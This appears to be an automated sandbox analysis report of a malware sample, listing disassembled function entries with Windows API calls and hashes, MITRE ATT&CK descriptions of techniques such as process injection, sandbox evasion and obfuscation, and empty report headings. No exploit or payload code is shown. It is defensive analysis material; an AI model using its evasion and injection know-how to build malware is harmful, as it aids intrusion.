Opcode Fuzzy Hash: e663817ef872ef5d6f47f06a66c3e442cebf20493938d915c182514aaa62b2d3
Instruction Fuzzy Hash: DD016231101725BBCF2A6FA0BC08ADF3B18AF25750F054138FD1996111DB39C99296D1

Uniqueness

Uniqueness Score: -1.00%

Function 00124BBA, Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00124BC8
GetParent.USER32(?), ref: 00124BDB
GetParent.USER32(?), ref: 00124BF5
SetFocus.USER32(?,00000000,?,00000000,001200C4), ref: 00124C0E

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Parent$Focus
String ID:
API String ID: 384096180-0
Opcode ID: 75a2deb90fa5643471ceb315d510a6a6406b5f1f1ed08edf42c1fa72bab39df0
Instruction ID: 5bda85f8bd6fb20a46be5ae32bc5a7be48af525259757b541656550ce994e0da
Opcode Fuzzy Hash: 75a2deb90fa5643471ceb315d510a6a6406b5f1f1ed08edf42c1fa72bab39df0
Instruction Fuzzy Hash: A5F0A432A00A109FCB157BB4EC1DA2E77AABF98701305093AB446C3171EF70DC219B10

Uniqueness

Uniqueness Score: -1.00%

Function 0012AF27, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,00000005), ref: 0012AF41
LoadResource.KERNEL32(?,00000000), ref: 0012AF49
LockResource.KERNEL32(00000000), ref: 0012AF56
FreeResource.KERNEL32(00000000,00000000,?,?), ref: 0012AF6E

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 4922a8965cd476005c940c4ae8dc854d7c2406f1bd9fac6c8383b8e59d99fc15
Instruction ID: 9349101ad7ef7ee384021840004362b700618e97a514e42fd44774a0b074bde7
Opcode Fuzzy Hash: 4922a8965cd476005c940c4ae8dc854d7c2406f1bd9fac6c8383b8e59d99fc15
Instruction Fuzzy Hash: 97F0B476500214BB8B00ABA8BC4CC9FFBBDEF956617114095FD05D3211EB758D1087A0

Uniqueness

Uniqueness Score: -1.00%

Function 00125F00, Relevance: 6.0, APIs: 4, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(000D2D64), ref: 00125F12
GetProcAddress.KERNEL32(00000000,000D2DB4), ref: 00125F22
RtlEncodePointer.NTDLL(00000000), ref: 00125F2B
RtlDecodePointer.NTDLL(00289820), ref: 00125F39

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID:
API String ID: 2061474489-0
Opcode ID: 83dbe4c1d4e305a6ddbd2e7b49bfba6a7248f19b43ed53ff3e67ddae79cef9b3
Instruction ID: 9f2a56cba06c42d7af263b8f1e0c113f473714ab5f6e5b47d46d28465b5306fd
Opcode Fuzzy Hash: 83dbe4c1d4e305a6ddbd2e7b49bfba6a7248f19b43ed53ff3e67ddae79cef9b3
Instruction Fuzzy Hash: A1F05435505726AF8F156FA0BD4DD6A3F6AEB097517060151FD06D2220DB71C8609FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00126473, Relevance: 6.0, APIs: 4, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(000D2D14), ref: 00126485
GetProcAddress.KERNEL32(00000000,000D2D2C), ref: 00126495
RtlEncodePointer.NTDLL(00000000), ref: 0012649E
RtlDecodePointer.NTDLL(0028980C), ref: 001264AC

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID:
API String ID: 2061474489-0
Opcode ID: a7bd71ea57bb1af8dd6295f75c80d6a14fd99c35c8d0fb313517b1bcb456ccbb
Instruction ID: bfd33b1914b8e425ab240705cda98430312d413ae3306849137c0e0118194af1
Opcode Fuzzy Hash: a7bd71ea57bb1af8dd6295f75c80d6a14fd99c35c8d0fb313517b1bcb456ccbb
Instruction Fuzzy Hash: B1F05E3960136AABCF167F60FC1D96A3FA9AF497503068111FD0596264DB74CC608FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0012600C, Relevance: 6.0, APIs: 4, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(000D20E8), ref: 0012601E
GetProcAddress.KERNEL32(00000000,000D2CF8), ref: 0012602E
RtlEncodePointer.NTDLL(00000000), ref: 00126037
RtlDecodePointer.NTDLL(00289808), ref: 00126045

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID:
API String ID: 2061474489-0
Opcode ID: b1c6d387ea71db310183711faaa04380bfe98644ee36f216dbc0be409bb8a78f
Instruction ID: 9a6b055ca14edd843e44d01bea51189c46897353aa80fc994facebb55dfe3b65
Opcode Fuzzy Hash: b1c6d387ea71db310183711faaa04380bfe98644ee36f216dbc0be409bb8a78f
Instruction Fuzzy Hash: 92F03039641336AF8B312B74BC0D9AA7E9CDF49B517168121FD05D22A0DF70CC90AAA4

Uniqueness

Uniqueness Score: -1.00%

Function 001263C4, Relevance: 6.0, APIs: 4, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(000D2D64), ref: 001263D6
GetProcAddress.KERNEL32(00000000,000D2DC8), ref: 001263E6
RtlEncodePointer.NTDLL(00000000), ref: 001263EF
RtlDecodePointer.NTDLL(00289824), ref: 001263FD

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID:
API String ID: 2061474489-0
Opcode ID: 4fc635ffc5e343d964cc7f7f96d7d45a32ae7dcf7927e156d55aa3d74bc47194
Instruction ID: 104197706ca7e059a148e0996a7fb8b170184a5beebe1c59a44f342fb3edd8f5
Opcode Fuzzy Hash: 4fc635ffc5e343d964cc7f7f96d7d45a32ae7dcf7927e156d55aa3d74bc47194
Instruction Fuzzy Hash: 9FF08235641336AB8B253B60BC0D96A3E9CAB497517064162FD46D62A0DB70CC908AB4

Uniqueness

Uniqueness Score: -1.00%

Function 00126422, Relevance: 6.0, APIs: 4, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(000D2D14,00000000,0011E3A3), ref: 00126431
GetProcAddress.KERNEL32(00000000,000D2D48), ref: 00126441
RtlEncodePointer.NTDLL(00000000), ref: 0012644A
RtlDecodePointer.NTDLL(00289810), ref: 00126458

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID:
API String ID: 2061474489-0
Opcode ID: 01344d6ff6adad5e0ef49867bab0071741ab703ec848ec6df4ce1f64443abb7c
Instruction ID: e2a8cdae78a47168783b771135777cea6ee00fc642acf2008181d347349e6703
Opcode Fuzzy Hash: 01344d6ff6adad5e0ef49867bab0071741ab703ec848ec6df4ce1f64443abb7c
Instruction Fuzzy Hash: 16E0D8357013329F8B103B707C0DA6A3A9DAF41B513064621FD42D62A8DF60CC918EB0

Uniqueness

Uniqueness Score: -1.00%

Function 00265DB8, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,00000000,?,002650D0,00000000,00000001,00000000,00000000,?,0025F48C,00000000,002811B0,00000000), ref: 00265DCF
GetLastError.KERNEL32(?,002650D0,00000000,00000001,00000000,00000000,?,0025F48C,00000000,002811B0,00000000,00000000,00000000,?,0025F9E0,00000010), ref: 00265DDB

Part of subcall function 00265DA1: CloseHandle.KERNEL32(00283870,00265DEB,?,002650D0,00000000,00000001,00000000,00000000,?,0025F48C,00000000,002811B0,00000000,00000000,00000000), ref: 00265DB1

___initconout.LIBCMT ref: 00265DEB

Part of subcall function 00265D63: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00265D92,002650BD,00000000,?,0025F48C,00000000,002811B0,00000000,00000000), ref: 00265D76

WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,?,002650D0,00000000,00000001,00000000,00000000,?,0025F48C,00000000,002811B0,00000000,00000000), ref: 00265E00

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: d3360b3c1075a2d194b22d5a46c6d29dc2b9d7ab98da42214969b1625de49649
Instruction ID: 4d119bb70b81a7418fff8435898109714da448ada7108a89951b045c45d80fc8
Opcode Fuzzy Hash: d3360b3c1075a2d194b22d5a46c6d29dc2b9d7ab98da42214969b1625de49649
Instruction Fuzzy Hash: A8F01C36010625BBCF222F95EC0CA8A3F66EF897A0F144010FE1886130DB32C9709B90

Uniqueness

Uniqueness Score: -1.00%

Function 00120ECE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetDlgCtrlID.USER32 ref: 00120EDF

Part of subcall function 00118C1C: __EH_prolog3.LIBCMT ref: 00118C23

__EH_prolog3_GS.LIBCMT ref: 00120F61

Strings

${(, xrefs: 00120EE8

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: CtrlH_prolog3H_prolog3_
String ID: ${(
API String ID: 2613406074-964378601
Opcode ID: 246b32ab951a3c979a4f65bb9077b751283b0183ecad5ac03caa8c3d7c60430b
Instruction ID: e6a1bb3091f97a8d6a853efc3d4ed219eba338d280f3971c12884949e002da24
Opcode Fuzzy Hash: 246b32ab951a3c979a4f65bb9077b751283b0183ecad5ac03caa8c3d7c60430b
Instruction Fuzzy Hash: D9219235A10314AFCB14EFA4D981AAEB3B9FF58310F104569F959A7282DF70AD61CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0013910B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 00139122
SendMessageW.USER32(?,000000B0,0000002E,?), ref: 00139166

Strings

., xrefs: 0013913E

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: MessageSendState
String ID: .
API String ID: 3919072728-248832578
Opcode ID: 5cd004dac457ffb8d4c3d5a7ec176549c75cc442209eb24f9734c45032314272
Instruction ID: 7e2b538765bb29ee2a751e16b0a767484fcd662a9d49b65ea15a23cdf82eecf6
Opcode Fuzzy Hash: 5cd004dac457ffb8d4c3d5a7ec176549c75cc442209eb24f9734c45032314272
Instruction Fuzzy Hash: D9017135200209FBDF295F50CC49EEEBB7BEB95361F044065F90566160CBB19A90AA50

Uniqueness

Uniqueness Score: -1.00%

Function 0012C45E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0012C484

Strings

8"(, xrefs: 00118710

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: MessageSend
String ID: 8"(
API String ID: 3850602802-1195279328
Opcode ID: f4df4aff9bbd5dc5580454c3b03bddab87545e53602010e6795003a07edcf560
Instruction ID: a44a7b563e430b5dee3a647fd3e9a6f4d27bdd3fcd83586d212206b461466a09
Opcode Fuzzy Hash: f4df4aff9bbd5dc5580454c3b03bddab87545e53602010e6795003a07edcf560
Instruction Fuzzy Hash: F2E086B4650204FFDF14EB50CE4AF9A76A8AB45705F2001A4F6045A1D2DBB1E9159A50

Uniqueness

Uniqueness Score: -1.00%

Function 0011FA2A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00118C1C: __EH_prolog3.LIBCMT ref: 00118C23

GetMessageTime.USER32 ref: 0011FA40
GetMessagePos.USER32 ref: 0011FA49

Strings

${(, xrefs: 0011FA30

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Message$H_prolog3Time
String ID: ${(
API String ID: 3041656633-964378601
Opcode ID: 0d15e663122a5d2545e080d86b91708ed0cc0f2aa1046205327ad1657a7ee528
Instruction ID: 88119c0b7f0a5538b96caaec87d0e80d77637011943f09fb9390652b7e5720d5
Opcode Fuzzy Hash: 0d15e663122a5d2545e080d86b91708ed0cc0f2aa1046205327ad1657a7ee528
Instruction Fuzzy Hash: CFE08C36C02B118BC3296B30A48D09A7BD0EF513203114D3EE8C283B50EF30E881CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0024A498, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0024A4A4

Part of subcall function 0024A3FC: std::exception::exception.LIBCONCRT ref: 0024A409

__CxxThrowException@8.LIBVCRUNTIME ref: 0024A4B2

Part of subcall function 0024C450: RaiseException.KERNEL32(?,?,0024A497,?,?,?,?,?,?,?,?,0024A497,?,00280C74,?), ref: 0024C4AF

Strings

Unknown exception, xrefs: 0024A4BF

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
String ID: Unknown exception
API String ID: 1586462112-410509341
Opcode ID: d59e39bf5ba9e6ccc27b26b951b5b2b51aa6a1f03541414a33962d2c7e74af74
Instruction ID: 0ee7879792f6b7ef79a90c2fa3081d74f6ba9cb86168e72e1df4f45413104978
Opcode Fuzzy Hash: d59e39bf5ba9e6ccc27b26b951b5b2b51aa6a1f03541414a33962d2c7e74af74
Instruction Fuzzy Hash: 2DD0A738A6020D77CF04FFA4C95585D7B6CEF00700B904060B604D2087E7B5D5258BD1

Uniqueness

Uniqueness Score: -1.00%

Function 0011930A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 00118C1C: __EH_prolog3.LIBCMT ref: 00118C23

__CxxThrowException@8.LIBVCRUNTIME ref: 00118718

Strings

${(, xrefs: 0011930F
8"(, xrefs: 00118710

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID: ${($8"(
API String ID: 3670251406-2716154285
Opcode ID: acb6fe251911bb33ddd781761c1d3517202ebb7a20d85c4b80d38b9c19395d2e
Instruction ID: 2a9dab0ae675016b56b6de013ba5f1b99441d75e32a69557513b868a8a865dfa
Opcode Fuzzy Hash: acb6fe251911bb33ddd781761c1d3517202ebb7a20d85c4b80d38b9c19395d2e
Instruction Fuzzy Hash: 5AD0126C673308FACB0CF7A28A4B9E9729D9B11704BB084B4FA14525D2DFB0EF545671

Uniqueness

Uniqueness Score: -1.00%

Function 00118738, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0011874C

Part of subcall function 0024C450: RaiseException.KERNEL32(?,?,0024A497,?,?,?,?,?,?,?,?,0024A497,?,00280C74,?), ref: 0024C4AF

__EH_prolog3.LIBCMT ref: 00118759

Part of subcall function 0011899F: LocalAlloc.KERNEL32(00000040,?,?,00118768,00000164,00000004, !(,00273990,?,?,?,002738DC), ref: 001189A7

Strings

!(, xrefs: 00118741, 0011874B

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: AllocExceptionException@8H_prolog3LocalRaiseThrow
String ID: !(
API String ID: 927841988-2116428523
Opcode ID: fcc9fa3ce7472e6d698f98bdc5036ffa8ab4ed69884bb2bbf69e1b48f4dd1e1b
Instruction ID: cc92d3eae43d7b5258864aa602c41c5ab58198f09fb407a82ebf950fe05a076b
Opcode Fuzzy Hash: fcc9fa3ce7472e6d698f98bdc5036ffa8ab4ed69884bb2bbf69e1b48f4dd1e1b
Instruction Fuzzy Hash: 90D012B49B170CFBDB48FB95CD0FD9EB19CDB10744F504054771056282DBF16B646662

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report sample4.bin

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Function 00116FA9, Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 472
COMMON

Function 000D121E, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67
memoryCOMMON

Function 013004FD, Relevance: 13.8, APIs: 9, Instructions: 333
memoryCOMMON

Function 0028FB73, Relevance: 13.8, APIs: 9, Instructions: 320
memoryCOMMON

Function 00147998, Relevance: 75.5, APIs: 42, Strings: 1, Instructions: 297
COMMON

Function 0014745F, Relevance: 68.6, APIs: 34, Strings: 5, Instructions: 373
stringCOMMON

Function 000D14EC, Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 206
memoryCOMMON

Function 00118A16, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 106
memoryCOMMONLIBRARYCODE

Function 000D22B0, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 85
memoryCOMMON

Function 000D2395, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91
memorysleepCOMMON

Function 0014700B, Relevance: 6.1, APIs: 4, Instructions: 60
COMMON

Function 00112F27, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
memoryCOMMON

Function 00118C1C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMONLIBRARYCODE

Function 000D216D, Relevance: 4.6, APIs: 3, Instructions: 63
memoryCOMMON

Function 000D13D3, Relevance: 3.0, APIs: 2, Instructions: 3
COMMON